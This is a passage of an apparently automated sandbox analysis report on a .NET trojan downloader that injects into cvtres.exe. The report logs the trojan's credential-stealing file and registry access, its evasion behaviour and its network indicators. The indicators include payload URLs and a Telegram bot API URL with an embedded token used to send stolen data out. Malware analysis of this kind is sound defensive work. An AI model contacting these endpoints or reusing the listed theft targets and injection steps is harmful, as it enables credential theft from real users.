                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 3452Thread sleep count: 9849 > 30Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWindow / User API: threadDelayed 9849Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.244534464.000000000087F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
                Source: cvtres.exe, 00000003.00000002.506578244.0000000009CC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00B5E1B0 LdrInitializeThunk,3_2_00B5E1B0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 402000Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 438000Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 43A000Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 968008Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09EC5594 GetUserNameW,3_2_09EC5594

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 5216, type: MEMORYSTR
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.3e19aa8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.3e19aa8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.242851689.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.245594271.0000000003D89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.498729589.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.243362450.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.242587735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe PID: 2280, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 5216, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: Yara matchFile source: 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 5216, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 5216, type: MEMORYSTR
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.3e19aa8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.3e19aa8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.242851689.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.245594271.0000000003D89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.498729589.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.243362450.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.242587735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe PID: 2280, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 5216, type: MEMORYSTR
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts211
                Windows Management Instrumentation
                Path Interception311
                Process Injection
                1
                Disable or Modify Tools
                2
                OS Credential Dumping
                1
                Account Discovery
                Remote Services11
                Archive Collected Data
                Exfiltration Over Other Network Medium1
                Web Service
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                System Shutdown/Reboot
                Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                Deobfuscate/Decode Files or Information
                1
                Input Capture
                114
                System Information Discovery
                Remote Desktop Protocol2
                Data from Local System
                Exfiltration Over Bluetooth1
                Ingress Tool Transfer
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                Obfuscated Files or Information
                1
                Credentials in Registry
                111
                Security Software Discovery
                SMB/Windows Admin Shares1
                Email Collection
                Automated Exfiltration11
                Encrypted Channel
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
                Software Packing
                NTDS1
                Process Discovery
                Distributed Component Object Model1
                Input Capture
                Scheduled Transfer3
                Non-Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Masquerading
                LSA Secrets131
                Virtualization/Sandbox Evasion
                SSHKeyloggingData Transfer Size Limits4
                Application Layer Protocol
                Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common131
                Virtualization/Sandbox Evasion
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items311
                Process Injection
                DCSync1
                System Owner/User Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                Remote System Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe100%Joe Sandbox ML
                No Antivirus matches
                SourceDetectionScannerLabelLinkDownload
                3.0.cvtres.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File
                3.0.cvtres.exe.400000.3.unpack100%AviraTR/Spy.Gen8Download File
                3.2.cvtres.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                3.0.cvtres.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                3.0.cvtres.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                3.0.cvtres.exe.400000.2.unpack100%AviraTR/Spy.Gen8Download File
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                http://DynDns.comDynDNS0%URL Reputationsafe
                https://api.telegram.org40%URL Reputationsafe
                https://sebastiank.tk/devv/POPO.txt3%VirustotalBrowse
                https://sebastiank.tk/devv/POPO.txt0%Avira URL Cloudsafe
                https://sebastiank.tk0%Avira URL Cloudsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                https://FU6DgqPJnyDGd.net0%Avira URL Cloudsafe
                https://sebastiank.tk/devv/DLLL.txt0%Avira URL Cloudsafe
                http://sebastiank.tk0%Avira URL Cloudsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                http://UEYOBD.com0%Avira URL Cloudsafe
                https://sebastiank.tk40%Avira URL Cloudsafe
                https://sebastiank.tkD80%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                sebastiank.tk
                162.240.35.239
                truefalse
                  unknown
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://sebastiank.tk/devv/POPO.txtfalse
                    • 3%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://sebastiank.tk/devv/DLLL.txtfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://api.telegram.org/bot5083863399:AAH9g72QTdN88jNOd6_tBrE8gEd-FpXnfHE/sendDocumentfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1cvtres.exe, 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://DynDns.comDynDNScvtres.exe, 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://api.telegram.org4cvtres.exe, 00000003.00000002.503821674.0000000006D0D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://api.telegram.orgcvtres.exe, 00000003.00000002.503821674.0000000006D0D000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://sebastiank.tkSecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245025227.00000000025F7000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%hacvtres.exe, 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://api.telegram.org/bot5083863399:AAH9g72QTdN88jNOd6_tBrE8gEd-FpXnfHE/SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245594271.0000000003D89000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000003.00000000.242587735.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          high
                          https://FU6DgqPJnyDGd.netcvtres.exe, 00000003.00000002.503667667.0000000006CCD000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://sebastiank.tkSecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245047543.0000000002610000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://api.telegram.orgcvtres.exe, 00000003.00000002.503890363.0000000006D20000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245025227.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000003.00000002.503821674.0000000006D0D000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipSecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245594271.0000000003D89000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000003.00000000.242587735.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://UEYOBD.comcvtres.exe, 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://api.telegram.org/bot5083863399:AAH9g72QTdN88jNOd6_tBrE8gEd-FpXnfHE/sendDocumentdocument-----cvtres.exe, 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://sebastiank.tk4SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245025227.00000000025F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://sebastiank.tkD8SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245081518.0000000002630000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                149.154.167.220
                                api.telegram.orgUnited Kingdom
                                62041TELEGRAMRUfalse
                                162.240.35.239
                                sebastiank.tkUnited States
                                46606UNIFIEDLAYER-AS-1USfalse
                                Joe Sandbox Version:35.0.0 Citrine
                                Analysis ID:680350
                                Start date and time: 08/08/202212:53:082022-08-08 12:53:08 +02:00
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 7m 49s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.27473 (renamed file extension from 27473 to exe)
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:27
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@3/1@2/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HDC Information:Failed
                                HCA Information:
                                • Successful, ratio: 98%
                                • Number of executed functions: 101
                                • Number of non-executed functions: 18
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, fs.microsoft.com, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                TimeTypeDescription
                                12:54:15API Interceptor1x Sleep call for process: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe modified
                                12:54:28API Interceptor730x Sleep call for process: cvtres.exe modified
                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                149.154.167.220request.exeGet hashmaliciousBrowse
                                  ContractXXPI.xlsxGet hashmaliciousBrowse
                                    SecuriteInfo.com.Variant.Bulz.937784.5501.exeGet hashmaliciousBrowse
                                      rust-stealer-xss.exeGet hashmaliciousBrowse
                                        a0V4cfjFCK.vbsGet hashmaliciousBrowse
                                          Required Purchase Order Ref 00172288.exeGet hashmaliciousBrowse
                                            CoRZhrNXxb.xlsGet hashmaliciousBrowse
                                              c6x4iN3EVE.xlsGet hashmaliciousBrowse
                                                VD3kw06iCC.xlsGet hashmaliciousBrowse
                                                  zpfIAGKnk7.xlsGet hashmaliciousBrowse
                                                    Facturas Pagadas al VencimientoPDF.exeGet hashmaliciousBrowse
                                                      wKQpOZ58Gl.exeGet hashmaliciousBrowse
                                                        RvYALbdIdN.exeGet hashmaliciousBrowse
                                                          I3bn6YJwLc.exeGet hashmaliciousBrowse
                                                            SecuriteInfo.com.W32.AIDetectNet.01.19566.exeGet hashmaliciousBrowse
                                                              SecuriteInfo.com.W32.AIDetectNet.01.19595.exeGet hashmaliciousBrowse
                                                                SecuriteInfo.com.Trojan.MSIL.FormBook.IZFA.MTB.26806.exeGet hashmaliciousBrowse
                                                                  SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeGet hashmaliciousBrowse
                                                                    ZYWXyzZQKo.exeGet hashmaliciousBrowse
                                                                      TgDofCOcVv.exeGet hashmaliciousBrowse
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        api.telegram.orgrequest.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        ContractXXPI.xlsxGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        AWB 5331810761 DOCS.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        SecuriteInfo.com.Variant.Bulz.937784.5501.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        rust-stealer-xss.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        a0V4cfjFCK.vbsGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        mbo7VImh26.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        Required Purchase Order Ref 00172288.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        CoRZhrNXxb.xlsGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        c6x4iN3EVE.xlsGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        VD3kw06iCC.xlsGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        zpfIAGKnk7.xlsGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        Facturas Pagadas al VencimientoPDF.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        wKQpOZ58Gl.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        RvYALbdIdN.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        I3bn6YJwLc.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        SecuriteInfo.com.W32.AIDetectNet.01.19566.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        SecuriteInfo.com.W32.AIDetectNet.01.19595.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        SecuriteInfo.com.Trojan.MSIL.FormBook.IZFA.MTB.26806.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        TELEGRAMRUrequest.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        ContractXXPI.xlsxGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        9wjhz2j3et.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.99
                                                                        SecuriteInfo.com.Variant.Bulz.937784.5501.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        Nx6jI5VUNl.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.99
                                                                        rKEgLUOUBV.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.99
                                                                        2q26XBTFHo.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.99
                                                                        OYAoPWfEl4.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.99
                                                                        8Lx0Glwj6L.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.99
                                                                        rust-stealer-xss.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        akJQGjPZB5.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.99
                                                                        CmK5qu31GG.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.99
                                                                        X4WDufM5Nt.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.99
                                                                        da5dINQkNa.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.99
